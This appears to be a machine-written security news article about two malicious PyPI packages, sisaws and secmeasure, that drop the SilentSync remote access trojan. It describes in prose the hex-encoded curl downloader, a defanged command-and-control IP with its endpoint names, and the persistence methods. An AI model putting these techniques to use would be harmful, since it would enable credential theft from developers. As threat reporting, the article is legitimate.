Ethical Hacking News
Two malicious PyPI packages have been discovered that deliver a remote access trojan called SilentSync on Windows systems, highlighting the growing risk of supply chain attacks within public software repositories.
Two malicious packages (sisaws and secmeasure) were found on the Python Package Index (PyPI) repository. The packages, designed to deliver a remote access trojan called SilentSync, mimic legitimate package behavior to avoid detection. SilentSync RAT can steal personally identifiable information (PII), execute remote commands, and capture screen content from popular browsers. Threat actors use typosquatting and impersonation tactics to gain access to PII through supply chain attacks. The packages' function "gen_token()" acts as a downloader for next-stage malware, sending a hard-coded token to receive a secondary static token. The SilentSync RAT has features for infecting Windows, Linux, and macOS systems, making it adaptable to different environments.
In a recent discovery, cybersecurity researchers have uncovered two malicious packages on the Python Package Index (PyPI) repository that are designed to deliver a remote access trojan called SilentSync on Windows systems. The malicious packages, sisaws and secmeasure, were uploaded by a user named "CondeTGAPIS" and have been found to mimic the behavior of legitimate Python packages.
The discovery highlights the growing risk of supply chain attacks within public software repositories. By leveraging typosquatting and impersonating legitimate packages, threat actors can gain access to personally identifiable information (PII). The SilentSync RAT is capable of remote command execution, file exfiltration, and screen capturing, as well as extracting web browser data, including credentials, history, autofill data, and cookies from popular browsers like Chrome, Brave, Edge, and Firefox.
The packages were found to have a function called "gen_token()" in the initialization script (__init__.py) that acts as a downloader for a next-stage malware. This function sends a hard-coded token as input and receives a secondary static token in response, similar to the legitimate SISA API. If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script.
The secmeasure package masquerades as a "library for cleaning strings and applying security measures" but harbors embedded functionality to drop SilentSync RAT. The malware is mainly geared towards infecting Windows systems at this stage, but it also has built-in features for Linux and macOS, making Registry modifications on Windows, altering the crontab file on Linux to execute the payload on system startup, and registering a LaunchAgent on macOS.
The package relies on the secondary token's presence to send an HTTP GET request to a hard-coded endpoint ("200.58.107[.]25") in order to receive Python code that is directly executed in memory. The server supports four different endpoints: /checkin, to verify connectivity; /comando, to request commands to execute; /respuesta, to send a status message; and /archivo, to send command output or stolen data.
Once the data is transmitted, all the artifacts are deleted from the host to sidestep detection efforts. The discovery of the malicious PyPI packages sisaws and secmeasure highlights the growing risk of supply chain attacks within public software repositories. By leveraging typosquatting and impersonating legitimate packages, threat actors can gain access to personally identifiable information (PII).
This incident serves as a reminder that even seemingly trustworthy software repositories can be vulnerable to manipulation by malicious actors. It is essential for developers and organizations to exercise caution when importing packages from PyPI or other public repositories and to regularly update their software and dependencies to prevent exploitation.
In conclusion, the SilentSync RAT delivered via two malicious PyPI packages targeting Python developers underscores the importance of staying vigilant against supply chain attacks and the need for robust security measures to protect personal identifiable information. As threat actors continue to evolve and adapt their tactics, it is crucial for organizations and individuals to remain proactive in their approach to cybersecurity.
Related Information:
https://www.ethicalhackingnews.com/articles/SilentSync-RAT-Delivered-via-Two-Malicious-PyPI-Packages-Targeting-Python-Developers-A-Growing-Risk-of-Supply-Chain-Attacks-ehn.shtml
https://thehackernews.com/2025/09/silentsync-rat-delivered-via-two.html
https://www.zscaler.com/blogs/security-research/malicious-pypi-packages-deliver-silentsync-rat
Published: Thu Sep 18 08:02:08 2025 by llama3.2 3B Q4_K_M
